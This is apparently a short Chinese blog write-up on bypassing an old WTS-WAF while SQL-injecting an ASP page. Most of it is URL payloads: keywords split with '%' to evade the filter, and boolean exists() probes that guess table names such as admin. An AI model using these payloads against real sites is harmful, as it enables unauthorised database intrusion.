起因
挖漏洞的時候總是會遇到
WAF
,繞過記錄
漏洞點
***view.asp?big=75&Id=1
漏洞點在
Id
參數
添加單引号報錯
來一波老套的
Id=1 and 1=1
,出現防火牆
***view.asp?big=75&Id=1%20and%201=1
bypass
老版本
WTS-WAF
繞過很簡單,在關鍵字裡面加
%
符号即可
***view.asp?big=75&Id=1%20an%d%201=1
成功繞過
猜表
猜表名,這個地方使用
burpsuite
暴力跑就行,也可以手動測一些比較正常的表名,例如
admin
***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20admin)
說明存在
admin
表,為了證明語句沒錯,再測一下
manager
表
***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20manager)
說明注入語句沒錯,
manager
表不存在
點到為止
參考連結
- https://zhuanlan.zhihu.com/p/27730232
- https://www.jianshu.com/p/b2da19279f1f